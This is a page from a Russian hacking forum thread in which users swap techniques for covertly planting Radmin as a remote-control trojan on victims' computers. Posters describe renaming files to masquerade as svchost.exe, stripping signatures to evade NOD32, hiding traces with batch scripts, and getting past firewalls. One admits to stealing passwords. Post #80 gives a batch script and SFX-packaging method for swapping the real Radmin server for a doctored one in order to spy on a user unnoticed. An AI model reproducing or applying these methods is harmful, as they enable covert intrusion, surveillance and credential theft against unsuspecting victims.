ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 16.03.2007, 22:08
Аватар для Derick
Derick
Новичок
Регистрация: 09.03.2007
Сообщений: 11
Провел на форуме:
12956

Репутация: 0
По умолчанию

Все я сам разобрался и с портом как менять и паролем !)
 
Ответить с цитированием

  #72  
Старый 23.03.2007, 14:27
Аватар для Prodi
Prodi
Новичок
Регистрация: 22.03.2007
Сообщений: 3
Провел на форуме:
22030

Репутация: 0
Thumbs up

Тема супер!
-И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ...
-Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ...
svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... )
set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки
raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator)
AdmDll.dll

-Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ...

-Есть одна только проблема:
Виндовозовский брадмауер, чётко обошли ...
А как быть с OutPost-ом
Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ...
Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg
-OutPost не принимает его в исключения (разрешённые программы)

-Может есть у кого, какие соображения на данную тему?
 
Ответить с цитированием

  #73  
Старый 26.03.2007, 18:14
Аватар для Vikemess
Vikemess
Новичок
Регистрация: 25.12.2006
Сообщений: 14
Провел на форуме:
239355

Репутация: 1
По умолчанию

Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )
 
Ответить с цитированием

  #74  
Старый 27.03.2007, 05:24
Аватар для P-29
P-29
Новичок
Регистрация: 04.08.2006
Сообщений: 15
Провел на форуме:
65556

Репутация: 0
По умолчанию

Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться .
 
Ответить с цитированием

  #75  
Старый 27.03.2007, 06:33
Аватар для Prodi
Prodi
Новичок
Регистрация: 22.03.2007
Сообщений: 3
Провел на форуме:
22030

Репутация: 0
По умолчанию

Цитата:
Сообщение от P-29  
Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться .
Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

- Чтож за NOD у тебя такой?
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит ....
 
Ответить с цитированием

  #76  
Старый 29.03.2007, 18:28
Аватар для Derick
Derick
Новичок
Регистрация: 09.03.2007
Сообщений: 11
Провел на форуме:
12956

Репутация: 0
По умолчанию

У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха
Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !
 
Ответить с цитированием

Проблема....
  #77  
Старый 03.04.2007, 00:10
Аватар для BrutAino
BrutAino
Новичок
Регистрация: 28.02.2007
Сообщений: 21
Провел на форуме:
681686

Репутация: 8
Question Проблема....

У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес

Последний раз редактировалось BrutAino; 03.04.2007 в 00:17..
 
Ответить с цитированием

  #78  
Старый 03.04.2007, 00:34
Аватар для iv.
iv.
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052

Репутация: 1204


По умолчанию

Цитата:
У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес
установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)
 
Ответить с цитированием

  #79  
Старый 10.04.2007, 23:07
Аватар для P-29
P-29
Новичок
Регистрация: 04.08.2006
Сообщений: 15
Провел на форуме:
65556

Репутация: 0
По умолчанию

Цитата:
Сообщение от Prodi  
Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

- Чтож за NOD у тебя такой?
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит ....
У меня с версий 2176 и палит без в сякого глубокава анализа, ранше да тока с глубоким палил.
 
Ответить с цитированием

  #80  
Старый 02.05.2007, 19:24
Аватар для dmn
dmn
Познающий
Регистрация: 10.12.2006
Сообщений: 40
Провел на форуме:
813492

Репутация: 21
По умолчанию

Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:

taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat

Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ